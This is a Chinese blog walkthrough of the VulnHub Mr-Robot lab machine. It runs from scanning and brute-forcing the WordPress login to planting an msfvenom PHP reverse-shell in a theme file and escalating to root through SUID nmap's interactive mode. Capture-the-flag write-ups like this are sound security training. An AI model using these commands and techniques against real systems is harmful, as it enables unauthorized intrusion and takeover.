Mrrobot靶机渗透实战-vuluhub系列(六)

最新推荐文章于 2024-03-08 12:53:00 发布
最新推荐文章于 2024-03-08 12:53:00 发布
阅读量574 收藏 1
点赞数 1
分类专栏: vuluhub靶机实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45447309/article/details/107122191
版权

这是vulnhub靶机系列文章的第六篇,本次主要知识点为:wordpress后台编辑模板getshell,suid提权-nmap命令,话不多说,直接开始吧... 

靶机下载地址:
https://www.vulnhub.com/entry/mr-robot-1,151/
 

#001 实验环境(nat模式)

攻击机:kali:192.168.136.129
靶机mrrobot:192.168.136.138

 

#002 实战writeup

寻找靶机ip,查找网卡中存活的主机,找到靶机ip:192.168.136.138

netdiscover -i eth0

 

扫描一下端口开放情况

nmap -T4 -A 192.168.136.138


发现开启的端口少得可怜,访问一下80端口,进入到一个挺酷的页面,稍微玩了一会,发现没有什么利用的点,扫一下目录看看,dirbuster,一看目录就知道是wordpress的站点

 

 

用wpscan扫了一下,没扫出用户名,也没看到什么可利用的点,只能另找出路,找了一下目录,实在是找不到利用的点了,去网上看了下大佬的文章,说可以利用license目录,去看看,但是并没找到密码,还得另找出路,我把目光转向了dic字典文件

 

访问一下robots.txt文件,看下有什么收获,发现了一个字典和key文件,访问字典文件后,提示下载,我就下载了下来

 

在想这里面会不会就存着后台登陆密码,所以我用burp爆破一下后台,用户密码都用这个字典

Load加载一下刚才的字典进行爆破

 

爆破了一会就出现了长度不一样的请求,单击查看

 

 

点击请求包查看response,4161长度的响应结果是invalid username

 

再查看4212长度的,用户名为elliot的请求包,返回结果是密码不对,所以确定用户名为elliot

 

然后去改一下,把用户名填正确的,只爆破密码

 

爆破了一个世纪之后,总算是爆破出来了,用户名:elliot  密码:ER28-0652

 

利用爆破出来的账号密码登陆后台,登陆成功

 

然后利用编辑模板反弹shell,生成msf反弹shell木马php的

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.136.129 lport=6666 -f raw >/root/shell.php

然后复制木马的内容,利用编辑模板getshell,我这里选择的是header.php的页面

 

将木马的内容插入模板中,点击下方的updatefile

 

Msf开启监听

 

访问http://192.168.136.138:80/wp-content/themes/twentyfifteen/header.php,看到成功反弹了meterpreter会话

 

 然后输入shell,并利用python脚本命令,转换终端,查看权限,不是root,所以需要提权

 

#003 提权操作

尝试一下用suid提权,

find / -user root -perm -4000 -print 2>/dev/null

发现竟然有nmap存在suid权限

 

 

 

nmap -V 查看版本,看是否可以利用,但是发现并不能执行,可能是当前用户/usr/bin目录下没有

 

 

习惯性的进入到/home目录下,ls查看目录,cd到robot目录下,查看目录下的文件,发现了robot的账号和MD5加密的密码,MD5解密到明文为abcdefghijklmnopqrstuvwxyz

 

su切换到robot用户,看是否能执行nmap命令,成功了,果然是刚才的用户执行不了

 

nmap版本(2.02—-5.2.1)都带有交互模式,允许用户执行shell命令,接下来利用这个提权

nmap --interactive    #进入到nmap的交互模式,
!sh    #获取shell

提权成功

 

 

#004 总结归纳

robots.txt文件的利用

配合burp爆破后台

Wordpress后台修改模板getshell姿势+配合msf使用

Nmap的suid提权利用

m0s30
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vuluhub靶场-breach1
ad12456的博客
05-03 1607
网络设置和准备: 该靶场的ip:192.168.110.140 ,我们要设置为仅主机模式。在虚拟机中将仅主机模式的ip地址范围包含靶机的ip。除了网络设置,还要准备两台kali。一台连接外网,一台和靶机一样要仅主机模式。 信息收集 Nmap扫描 启动靶机,启动kali攻击机。现在了解的信息就一个:IP。首先用nmap扫描端口,看看开启了什么服务。 namp -T4 -A -v 192.168.110.140 发现端口大量的开放,推测应该是安装了蜜罐之类的防护。那我们用最常用的服务端口:80 试一试看
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-6
Aluxian_的博客
03-20 1939
Vulnhub靶机driftingblues6_vh渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机漏洞详解:①:信息收集:②:开始目录爆破:③:暴力破解zip:③:上传WebShell:④:脏牛提权:⑤:获取flag:Vulnhub靶机渗透总结: Vulnhub靶机介绍: Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/driftingblues-6,672/ Vulnhub靶机漏洞详解: ①:信息收集: kali里使用net
vulnhub靶场实战系列(一)之vulnhub靶场介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-07 2845
我们在学习了各种web漏洞的原理和各种内网的攻击手法的利用之后,需要实战来提升经验,这一环节就可以有操作系统靶场平台来代替一方面因为靶场是现成的,已经搭建好的靶场,只需要下载到本地用虚拟机安装就可以了,非常省时。第二点,非常安全,我们要知道没有经过法律允许的渗透行为是犯法的,而我们使用靶场来模拟达到实战训练的目的的同时也不会触碰法律。名称描述网站vulnhub与Kali同一家公司(offsec)出品。一共有600多个镜像,可以在VMWare或者VirtualBox打开,有不同难度。
Vulnhub靶机-Prime1
最新发布
m0_74855736的博客
03-08 926
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
wordpress后台暴力破解
m0_71366428的博客
12-14 744
暴力破解漏洞的产生是由于服务器端没有做限制,导致攻击者可以通过暴力的手段破解所需信息,如用户名、密码、短信验证码等。暴力破解的关键在于字典的大小及字典是否具有针对性,如登录时,需要输入4位数字的短信验证码,那么暴力破解的范围就是0000~9999。
看完这篇教你玩转靶机 MR-ROBOT: 1
清唪的博客
03-27 5002
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。 靶机下载: 官网:https://download.vulnhub.com/mrrobot/mrRobot.ovahttps://download.vulnhub.com/mrrobot/mrRobot.ova
渗透入门Mr-robott靶机练习.doc
07-09
一款入门级别靶机Mr-robot的练习思路
MrRobot-Logo-Project:重新创建和收集“ Mr Robot”电视节目的虚构徽标作为矢量文件的项目
03-06
机器人先生徽标项目 正在进行的工作-随时贡献自己的力量! 重新创建和收集“ Mr Robot”电视节目的虚构徽标作为矢量文件的项目 徽标: 免责声明 这是一个由粉丝制作的项目,与任何正式的机器人先生电视节目或美国...
mrRobot.ova
07-16
SHA256: 1B69E9D8139D27387ED0EED112146FA6277272D1622A789E3CFEFBC456ABFA4F
MrRobot:您可能在计算机上拥有的最愚蠢的程序
05-03
警告:运行该程序很危险。...python MrRobot.py [--OPTIONS] input_directory python MrRobot.py [--OPTIONS] input_file OPTIONS: -h --help : Displays this message. -v --verbose : Enables verbose mode.
v1ew-s0urce:v1ew-s0urce由59Dark团队构建的侦察工具
04-15
5 / 9Dark的v1ew-s0urce –渗透测试框架和侦察工具渗透测试框架,扫描仪以及更多您需要做的一切!v1ew-s0urce打击了机器人先生加入迪斯科! 我们仍在构建此工具,请查看我们的不和谐之处!看看我们的网站!
vulnhub靶场渗透mrrobot漏洞复现
qq_61702710的博客
07-27 717
此 VM 有三个密钥隐藏在不同的位置。你的目标是找到所有三个。每个钥匙都越来越难找到。 VM 并不太困难。没有任何高级利用或逆向工程。该级别被认为是初级 - 中级。
vlunhub靶机之morrobot
hanjinming110的博客
03-12 149
morrobot靶机
漏洞靶场实战-Vuluhub medium_socnet
qq_53058639的博客
02-04 478
Vulnhub 是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可,但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容,所以推荐 VirtualBox下载的是一个 ovf 后缀的文件,打开 VirtualBox,导入导入完毕后根据需求编辑虚拟机设置。
kali渗透综合靶机(十五)--Breach-1.0靶机
W小哥
04-01 2112
一、靶机下载 下载链接:https://download.vulnhub.com/breach/Breach-1.0.zip 二、Breach-1.0靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为ho...
Vulnhub项目:MrRobot
Ays.Ie的博客
04-20 503
Vulnhub项目:Mr Robot
VulnHub--mrrobot
记录笔记
07-06 813
Vulnhub靶场--Mr robot 靶机
[vuluhub]-(GoldenEye)
weixin_47920370的博客
08-25 1041
我们在国外漏洞库搜索的时候,发现他要是用PSpellShell,经过仔细寻找,然后我们在Site administration ->Advanced features -> Plugins->Text editors->TinyMCE HTML editor。hydra -L wangkun.txt -P /usr/share/wordlists/fasttrack.txt 192.168.159.154 -s 55007 pop3 --用九头蛇对pop3进行爆破。用邮件里面的用户名和密码进行登陆一下。..
Mr.Robot靶机 - 机器人先生
Ms08067安全实验室
03-02 2134
本文作者:恩格尔-src小组﹀﹀﹀靶机简介:靶机主题来自美剧《黑客军团》,这是一部传达极客精神和黑客文化的上佳作品,不同于《硅谷》的搞笑风格,这部剧的主角Eliot患有精神分裂,整部剧的...
Tryhackme Mr Robot CTF
dlccom的博客
12-02 447
Tryhackme Mr Robot CTF

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值